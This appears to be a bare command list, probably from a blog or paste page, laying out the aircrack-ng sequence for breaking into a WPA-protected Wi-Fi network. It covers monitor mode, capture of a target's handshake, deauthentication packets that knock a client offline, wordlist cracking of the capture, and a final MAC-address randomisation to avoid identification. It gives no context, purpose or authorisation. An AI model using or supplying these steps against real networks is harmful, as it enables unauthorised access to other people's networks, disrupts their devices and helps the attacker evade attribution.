sudo su
iwconfig
airmon-ng start INTERFACE
airodump-ng SPOOFEDINTERFACE
airmon-ng stop SPOOFEDINTERFACE
airmon-ng start INTERFACE CHANNEL
airodump-ng -c CHANNEL --bssid BSSID -w psk SPOOFEDINTERFACE
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID SPOOFEDINTERFACE
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
sudo ifconfig SPOOFEDINTERFACE down && sudo macchanger -r INTERFACE && sudo macchanger -r SPOOFEDINTERFACE && ifconfig SPOOFEDINTERFACE up
0 Comments